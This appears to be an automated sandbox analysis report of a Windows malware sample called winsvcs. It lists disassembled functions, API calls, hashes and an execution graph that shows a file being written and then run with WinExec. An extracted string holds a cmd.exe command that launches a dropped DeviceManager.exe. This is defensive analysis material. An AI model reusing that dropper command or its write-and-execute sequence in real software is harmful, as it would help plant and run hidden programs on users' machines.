                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateInitializeInstance
                                                                                                                                                                                                                          • String ID: %windir%\system32\cmd.exe$/c start _ & _\DeviceManager.exe & exit
                                                                                                                                                                                                                          • API String ID: 3519745914-2217386832
                                                                                                                                                                                                                          • Opcode ID: 132f5f5c97dbb597229882e81c4ab9378bc9746ca38293107714f6a099fd9e5a
                                                                                                                                                                                                                          • Instruction ID: 57fe1dbd42bb2324eb575007eabe7048b87a754a97f5de83621bb56dba04deff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 132f5f5c97dbb597229882e81c4ab9378bc9746ca38293107714f6a099fd9e5a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C414C74A00209EFDB01DF98D989E9DBBB1FF49305F1081A5F921AB2A1C775AA50EF44
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B2D0), ref: 0041172F
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B2D0), ref: 00411784
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(0044A620), ref: 00411868
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,00000000,00000000,0040EE65), ref: 00411884
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$DeleteEnterExceptionLeaveRaise
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3416413283-0
                                                                                                                                                                                                                          • Opcode ID: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
                                                                                                                                                                                                                          • Instruction ID: 13516defa6da1fa1ea0f36df8edcfa91a04d8b774725dd04c741ba324b34f0a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 974173B5600208EFDB10AF65E884B9777A9FF04314F04816AFD198B361E778ED80CB59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004335DE
                                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00433612
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000000,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 00433643
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000001,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 004336B1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                                          • Opcode ID: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
                                                                                                                                                                                                                          • Instruction ID: 311c7ba4c8e43137f5e4a7efccb9debf39a4ffc4a742db9a7ca4f6796694eb12
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3631C031604246FFDB20DF64C8869AB7BA0FF09312F1495AAE4618B291DB34DE40DB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$String_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1108949412-0
                                                                                                                                                                                                                          • Opcode ID: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
                                                                                                                                                                                                                          • Instruction ID: dca89a99140dcdefd2515e70e36f7115f501ce712d998d2b27d11117e8ebcf95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95219233305516AFD7209B15FC84FEBF7A8FBD5325F01456BF5048A210D636D89287A4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00411A70), ref: 00423DC1
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423DC8
                                                                                                                                                                                                                            • Part of subcall function 00423CD9: IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00423DEA
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00423E17
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HeapVirtual$AllocAllocateFeatureFreePresentProcessProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2677508003-0
                                                                                                                                                                                                                          • Opcode ID: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
                                                                                                                                                                                                                          • Instruction ID: 33552fc1f294df3a2b2b113b899d939f80dfa8ae59bb1af21b4907c51dd0f451
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83016135304221A7EB311F6ABC09B673676EB85B02F950036F901E62A0CB6CCD41869C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                          • Instruction ID: 778b9b8891b73742fb5b30d1044a06d15375a4591dad267e5ab082aca22325bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B03250005EFBCF125E86EC11CEE3F26BF18354B888856FE1958131C63AD9B2AB95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042C356
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042C36D
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0042C37B
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 0042C38B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3521780317-0
                                                                                                                                                                                                                          • Opcode ID: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
                                                                                                                                                                                                                          • Instruction ID: 1f90ef54278d78fe482f5476074c301cb1ab8b2a9e1e54857d71ca385ae67bc9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AF06D32B40720DADB20EBB6B54674E33A0AB00724FD58A5FF800A7291CB6C5802DB5E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception@8Throw_memcpy_s
                                                                                                                                                                                                                          • String ID: list<T> too long
                                                                                                                                                                                                                          • API String ID: 4160651998-4027344264
                                                                                                                                                                                                                          • Opcode ID: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
                                                                                                                                                                                                                          • Instruction ID: 87061816adbd77505f6fdf6fe6a369285cef3fe4ca098932c01a2f47f64931ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c742a53003cf5b4a42beaa5c9e332160a10667cf4b588755a10ceac9223e1b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E21BF706483008FD710DE15C84076FBAE1BB98308F604E1EF5D557682C7B9DA898B8B
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Exception@8Throw_memcpy_s
                                                                                                                                                                                                                          • String ID: deque<T> too long
                                                                                                                                                                                                                          • API String ID: 4160651998-309773918
                                                                                                                                                                                                                          • Opcode ID: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
                                                                                                                                                                                                                          • Instruction ID: 76a7e499c38a90962a59699183f8a2dce48751c19508e120701b83a76bc7192f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c6964cb9e37735a2a9789e4afb503501908d47ac08314a2fc1e04fe0174ab39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721B0707483409FD710DF55C84066FB7E1AB98308F504E0EF5D117682C7B8E9898B9B
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 004291FA
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429208
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 803148776-1018135373
                                                                                                                                                                                                                          • Opcode ID: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
                                                                                                                                                                                                                          • Instruction ID: 2cfbca0fe2cdbec7ade19a9cc29750f231db107eaf6571eb885056c95e9ab353
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd0533e9162e1268b6a8c6e7b7f7a53d39f74832169e6eeb33821c90969245f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4601A234A01328EACF35DF62E44066EB3B9AF00311FD4486FE84096751CF389D91EB69

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:12%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:9.9%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:1086
                                                                                                                                                                                                                          Total number of Limit Nodes:25
                                                                                                                                                                                                                          execution_graph 13389 40fc5d InvalidateRect 13390 40fc71 13389->13390 12268 479000 12270 479044 GetPEB 12268->12270 12274 479077 CreateFileA 12270->12274 12272 479265 12273 47922d 12275 479246 WriteFile 12273->12275 12276 479244 12273->12276 12274->12272 12274->12273 12277 479255 FindCloseChangeNotification WinExec 12275->12277 12276->12277 12277->12272 13391 429b0c HeapCreate 13392 429b30 13391->13392 12278 40b517 12279 40b5b5 GetDC 12278->12279 12280 40b54c 12278->12280 12281 40b637 17 API calls 12279->12281 12280->12279 12284 40b564 GetDlgItem GetClientRect MoveWindow InvalidateRect 12280->12284 12282 40b812 CreateWindowExA 12281->12282 12283 40b80c 12281->12283 12285 40b840 9 API calls 12282->12285 12283->12285 12284->12279 12286 40b925 9 API calls 12285->12286 12288 40ba97 CreateFontIndirectA SelectObject SendMessageA SetTextColor 12286->12288 12289 40baf1 12288->12289 12290 40bb31 13 API calls 12289->12290 12291 40bcb2 12290->12291 12292 40bcb8 CreateWindowExA 12290->12292 12293 40bce6 9 API calls 12291->12293 12292->12293 12294 40bdda 12293->12294 12295 40be06 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 12294->12295 12296 40bea8 12295->12296 12297 40beac CreateWindowExA 12295->12297 12298 40beda 10 API calls 12296->12298 12297->12298 12299 40c027 CreateFontIndirectA SelectObject SendMessageA SetTextColor 12298->12299 12301 40c06e 12299->12301 12300 40f15e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12301->12300 12302 40c0fe CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 12301->12302 12308 40c0ad GetDlgItem GetClientRect MoveWindow InvalidateRect 12301->12308 12303 40c1b3 12302->12303 12304 40c1b9 CreateWindowExA 12302->12304 12305 40c1e7 9 API calls 12303->12305 12304->12305 12306 40c2d2 GetDC 12305->12306 12307 40c2cc 12305->12307 12309 40c35a CreateFontIndirectA SelectObject SendMessageA SetTextColor 12306->12309 12307->12306 12308->12302 12310 40c3b2 GetDC 12309->12310 12311 40c3a8 12309->12311 12312 40c43a CreateFontIndirectA SelectObject SendMessageA SetTextColor 12310->12312 12311->12310 12313 40c488 8 API calls 12312->12313 12315 40c595 12313->12315 12316 40f116 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12313->12316 12317 40c604 13 API calls 12315->12317 12321 40c5b4 GetDlgItem GetClientRect MoveWindow InvalidateRect 12315->12321 12316->12300 12318 40c790 CreateWindowExA 12317->12318 12319 40c78a 12317->12319 12320 40c7be 9 API calls 12318->12320 12319->12320 12323 40c88c 12320->12323 12321->12317 12322 40f0ce SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12322->12316 12323->12322 12324 40c91e GetDC 12323->12324 12329 40c8cd GetDlgItem GetClientRect MoveWindow InvalidateRect 12323->12329 12325 40c9a0 CreateFontIndirectA SelectObject SendMessageA SetTextColor 12324->12325 12326 40c9f2 12325->12326 12327 40f086 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12325->12327 12328 40ca62 GetDC 12326->12328 12333 40ca11 GetDlgItem GetClientRect MoveWindow InvalidateRect 12326->12333 12327->12322 12330 40cae4 9 API calls 12328->12330 12329->12324 12331 40cbb7 12330->12331 12332 40cbbd CreateWindowExA 12330->12332 12334 40cbeb 10 API calls 12331->12334 12332->12334 12333->12328 12335 40cd38 12 API calls 12334->12335 12336 40f03e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12335->12336 12337 40ce5f 12335->12337 12336->12327 12338 40cece 9 API calls 12337->12338 12342 40ce7e GetDlgItem GetClientRect MoveWindow InvalidateRect 12337->12342 12339 40d033 CreateFontIndirectA SelectObject SendMessageA SetTextColor 12338->12339 12340 40d084 12339->12340 12341 40eff6 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12339->12341 12343 40d0ff 9 API calls 12340->12343 12346 40d0a3 GetDlgItem GetClientRect MoveWindow InvalidateRect 12340->12346 12341->12336 12342->12338 12344 40d258 CreateFontIndirectA SelectObject SendMessageA SetTextColor GetDC 12343->12344 12345 40d31e 17 API calls 12344->12345 12347 40d4d3 12345->12347 12348 40d4d9 CreateWindowExA 12345->12348 12346->12343 12349 40d507 9 API calls 12347->12349 12348->12349 12351 40d5f2 12349->12351 12350 40efae SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12350->12341 12351->12350 12352 40d6d9 GetDC 12351->12352 12358 40d688 GetDlgItem GetClientRect MoveWindow InvalidateRect 12351->12358 12353 40d75b CreateFontIndirectA SelectObject SendMessageA SetTextColor 12352->12353 12354 40d7c9 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 12353->12354 12355 40d7ac 12353->12355 12356 40d877 12354->12356 12357 40d87d CreateWindowExA 12354->12357 12355->12354 12359 40d8ab 9 API calls 12356->12359 12357->12359 12358->12352 12361 40d979 12359->12361 12360 40ef66 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12360->12350 12361->12360 12362 40da0b GetDC 12361->12362 12366 40d9ba GetDlgItem GetClientRect MoveWindow InvalidateRect 12361->12366 12363 40da8d 9 API calls 12362->12363 12364 40db73 CreateWindowExA 12363->12364 12365 40db6d 12363->12365 12367 40dba1 9 API calls 12364->12367 12365->12367 12366->12362 12368 40dc70 8 API calls 12367->12368 12370 40ef1e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12368->12370 12371 40dd6e 12368->12371 12370->12360 12372 40ddd8 CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 12371->12372 12378 40dd8d GetDlgItem GetClientRect MoveWindow InvalidateRect 12371->12378 12373 40de87 12372->12373 12374 40de8d CreateWindowExA 12372->12374 12375 40debb 9 API calls 12373->12375 12374->12375 12376 40df8a 13 API calls 12375->12376 12379 40e130 CreateWindowExA 12376->12379 12380 40e12a 12376->12380 12378->12372 12381 40e15e 10 API calls 12379->12381 12380->12381 12382 40e2b2 CreateFontIndirectA SelectObject SendMessageA SetTextColor 12381->12382 12385 40e303 12382->12385 12383 40eed6 SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12383->12370 12384 40e3a6 GetDC 12387 40e436 CreateFontIndirectA SelectObject SendMessageA SetTextColor 12384->12387 12385->12383 12385->12384 12388 40e34f GetDlgItem GetClientRect MoveWindow InvalidateRect 12385->12388 12389 40e49b 12387->12389 12388->12384 12390 40ee8e SendMessageW SendMessageA GetModuleHandleA LoadIconA SendMessageA 12389->12390 12393 40e4c8 12389->12393 12390->12383 12391 40e54e CreateSolidBrush LoadCursorA LoadIconA GetModuleHandleA LoadIconA 12394 40e620 CreateWindowExA 12391->12394 12395 40e61c 12391->12395 12393->12391 12397 40e4ee GetDlgItem GetClientRect MoveWindow InvalidateRect 12393->12397 12396 40e64e 18 API calls 12394->12396 12395->12396 12398 40eb2b SendMessageA SetTimer TrackPopupMenuEx 12396->12398 12404 40e825 SHGetDesktopFolder 12396->12404 12397->12391 12399 40eb96 KillTimer 12398->12399 12400 40eb9f BeginPaint IsRectEmpty 12398->12400 12399->12400 12402 40ebf2 EndPaint GetClientRect CreateCompatibleDC 12400->12402 12403 40ebc6 GetSystemTime SetTimer 12400->12403 12405 40ecf7 GetCursorInfo 12402->12405 12406 40ec38 SelectObject 12402->12406 12403->12402 12417 40e8de 12404->12417 12407 40ed4b GetCursorPos WindowFromPoint 12405->12407 12408 40ed2f 12405->12408 12409 40ecf0 DeleteDC 12406->12409 12410 40ec4b GetObjectA 12406->12410 12411 40ed71 GetWindowThreadProcessId GetCurrentThreadId 12407->12411 12412 40edac GetCursor 12407->12412 12408->12407 12409->12405 12413 40ec65 GetClientRect StretchBlt BitBlt 12410->12413 12414 40ece8 SelectObject 12410->12414 12411->12412 12415 40ed88 AttachThreadInput 12411->12415 12416 40edb2 12412->12416 12413->12414 12414->12409 12415->12412 12418 40ed96 GetCursor AttachThreadInput 12415->12418 12419 40ee10 GetDC EnumFontFamiliesA GetActiveWindow 12416->12419 12423 40edda StrRetToStrA 12416->12423 12417->12398 12418->12412 12418->12416 12430 410c90 12419->12430 12421 40ee4a 12470 411160 12421->12470 12423->12419 12425 40edef 12423->12425 12453 424ee2 12425->12453 12428 40ee65 12429 40ee00 12429->12419 12431 410ca2 12430->12431 12432 410dc9 RaiseException 12430->12432 12431->12432 12433 410caa GetCurrentThreadId RtlEnterCriticalSection RtlLeaveCriticalSection 12431->12433 12432->12421 12491 423370 RtlEnterCriticalSection RegisterClipboardFormatA RegisterClipboardFormatA GetClassInfoExA 12433->12491 12435 410ce4 FindResourceA 12436 410d8f 12435->12436 12437 410cfc FindResourceA 12435->12437 12436->12421 12438 410d11 LoadResource LockResource 12437->12438 12439 410d24 12437->12439 12440 410d26 LoadResource 12438->12440 12439->12440 12441 410d36 LockResource 12440->12441 12442 410dba GetLastError 12440->12442 12444 410d43 12441->12444 12445 410dab GetLastError 12441->12445 12443 410d8b 12442->12443 12443->12436 12446 410da2 SetLastError 12443->12446 12506 410df0 12444->12506 12445->12443 12446->12436 12448 410d4a DialogBoxIndirectParamA 12449 410d71 GetLastError 12448->12449 12450 410d68 12448->12450 12451 410d6d 12449->12451 12450->12449 12450->12451 12451->12443 12452 410d7d GlobalHandle GlobalFree 12451->12452 12452->12443 12454 424eee __msize 12453->12454 12455 424f19 __stbuf 12454->12455 12456 424efc 12454->12456 12843 4272b4 12455->12843 12457 427ffb __lseeki64_nolock 44 API calls 12456->12457 12458 424f01 12457->12458 12459 42515e _strcpy_s 4 API calls 12458->12459 12462 424f11 __msize 12459->12462 12461 424f2b __stbuf 12848 427351 12461->12848 12462->12429 12464 424f3d __stbuf 12855 427421 12464->12855 12466 424f55 __stbuf 12874 4273ed 12466->12874 13255 411180 12470->13255 12473 40ee5b 12475 411720 RtlEnterCriticalSection 12473->12475 12476 41177c RtlLeaveCriticalSection 12475->12476 12477 41173c 12475->12477 12480 411791 12476->12480 12487 4117b5 12476->12487 12478 411742 DestroyWindow 12477->12478 12479 411754 12477->12479 12478->12476 12478->12479 12481 411761 12479->12481 12483 42592a __getptd_noexit 44 API calls 12479->12483 12482 41179e 12480->12482 12484 42592a __getptd_noexit 44 API calls 12480->12484 12481->12476 12485 42592a __getptd_noexit 44 API calls 12482->12485 12482->12487 12483->12481 12484->12482 12485->12487 12486 411875 12486->12428 12487->12486 12489 411879 RaiseException 12487->12489 12490 411831 12487->12490 12488 411864 RtlDeleteCriticalSection 12488->12486 12489->12428 12490->12488 12492 4234b2 GetClassInfoExA 12491->12492 12493 4233cd LoadCursorA RegisterClassExA 12491->12493 12494 4235c4 RtlLeaveCriticalSection 12492->12494 12495 4234e9 LoadCursorA RegisterClassExA 12492->12495 12493->12494 12501 423438 12493->12501 12494->12435 12495->12494 12496 423550 12495->12496 12498 42358c 12496->12498 12499 4235e2 12496->12499 12504 42356c 12496->12504 12497 42347e 12497->12492 12498->12494 12500 4235fa 12499->12500 12526 41fe50 RaiseException 12499->12526 12500->12500 12501->12492 12501->12497 12501->12499 12515 4259b8 12501->12515 12504->12498 12505 4259b8 __recalloc 50 API calls 12504->12505 12505->12498 12508 410e07 12506->12508 12507 411120 12507->12448 12508->12507 12509 410f9d GlobalAlloc 12508->12509 12833 425302 12509->12833 12512 410fb4 12513 411112 12512->12513 12514 425302 _memcpy_s 44 API calls 12512->12514 12842 41fe50 RaiseException 12512->12842 12513->12448 12514->12512 12516 4259c7 12515->12516 12517 4259ef 12515->12517 12516->12517 12518 4259d3 12516->12518 12519 425a04 12517->12519 12533 42a9ca 12517->12533 12527 427ffb 12518->12527 12546 42a7af 12519->12546 12525 4259e8 _memset 12525->12497 12526->12499 12582 4282d1 GetLastError 12527->12582 12529 4259d8 12530 42515e 12529->12530 12531 4280fe __decode_pointer 4 API calls 12530->12531 12532 42516e __invoke_watson 12531->12532 12534 42a9d6 __msize 12533->12534 12535 42aa03 12534->12535 12536 42a9e6 12534->12536 12538 42aa44 RtlSizeHeap 12535->12538 12540 429cb8 __lock 44 API calls 12535->12540 12537 427ffb __lseeki64_nolock 44 API calls 12536->12537 12539 42a9eb 12537->12539 12542 42a9fb __msize 12538->12542 12541 42515e _strcpy_s 4 API calls 12539->12541 12543 42aa13 ___sbh_find_block 12540->12543 12541->12542 12542->12519 12797 42aa64 12543->12797 12547 42a7bb __msize 12546->12547 12548 42a7c2 12547->12548 12549 42a7d0 12547->12549 12801 425aa0 12548->12801 12551 42a7e3 12549->12551 12552 42a7d7 12549->12552 12562 42a955 12551->12562 12580 42a7f0 ___sbh_resize_block ___sbh_find_block 12551->12580 12553 42592a __getptd_noexit 44 API calls 12552->12553 12573 42a7ca __dosmaperr __msize 12553->12573 12554 42a988 12556 428053 _realloc 4 API calls 12554->12556 12555 42a95a RtlReAllocateHeap 12555->12562 12555->12573 12558 42a98e 12556->12558 12557 429cb8 __lock 44 API calls 12557->12580 12560 427ffb __lseeki64_nolock 44 API calls 12558->12560 12559 42a9ac 12563 427ffb __lseeki64_nolock 44 API calls 12559->12563 12559->12573 12560->12573 12561 428053 _realloc 4 API calls 12561->12562 12562->12554 12562->12555 12562->12559 12562->12561 12564 42a9a2 12562->12564 12565 42a9b5 GetLastError 12563->12565 12567 427ffb __lseeki64_nolock 44 API calls 12564->12567 12565->12573 12569 42a923 12567->12569 12568 42a87b RtlAllocateHeap 12568->12580 12571 42a928 GetLastError 12569->12571 12569->12573 12570 42a8d0 RtlReAllocateHeap 12570->12580 12571->12573 12572 42a4ca ___sbh_alloc_block 5 API calls 12572->12580 12573->12525 12574 42a93b 12574->12573 12576 427ffb __lseeki64_nolock 44 API calls 12574->12576 12575 428053 _realloc 4 API calls 12575->12580 12577 42a948 12576->12577 12577->12565 12577->12573 12578 42a91e 12579 427ffb __lseeki64_nolock 44 API calls 12578->12579 12579->12569 12580->12554 12580->12557 12580->12568 12580->12570 12580->12572 12580->12573 12580->12574 12580->12575 12580->12578 12581 429d1b HeapFree ___sbh_free_block 12580->12581 12817 42a8f3 12580->12817 12581->12580 12596 428179 TlsGetValue 12582->12596 12585 42833e SetLastError 12585->12529 12590 428335 12628 42592a 12590->12628 12591 42831d 12614 4281ea 12591->12614 12594 428325 GetCurrentThreadId 12594->12585 12595 42833b 12595->12585 12597 4281a9 12596->12597 12598 42818e 12596->12598 12597->12585 12601 42d60f 12597->12601 12599 4280fe __decode_pointer 4 API calls 12598->12599 12600 428199 TlsSetValue 12599->12600 12600->12597 12604 42d618 12601->12604 12603 4282fc 12603->12585 12606 4280fe 12603->12606 12604->12603 12605 42d636 Sleep 12604->12605 12641 42b241 12604->12641 12605->12604 12613 428112 12606->12613 12607 428137 GetModuleHandleW 12608 428152 GetProcAddress 12607->12608 12609 428147 12607->12609 12612 42812f 12608->12612 12776 42ad25 12609->12776 12612->12590 12612->12591 12613->12607 12613->12612 12780 426fac 12614->12780 12616 4281f6 GetModuleHandleW 12617 428206 12616->12617 12620 42820c 12616->12620 12618 42ad25 __crt_waiting_on_module_handle 2 API calls 12617->12618 12618->12620 12619 429cb8 __lock 42 API calls 12621 428267 InterlockedIncrement 12619->12621 12620->12619 12781 4282bf 12621->12781 12624 429cb8 __lock 42 API calls 12625 428288 ___addlocaleref 12624->12625 12784 4282c8 12625->12784 12627 4282b3 __msize 12627->12594 12629 425936 __msize 12628->12629 12630 425975 12629->12630 12631 4259af 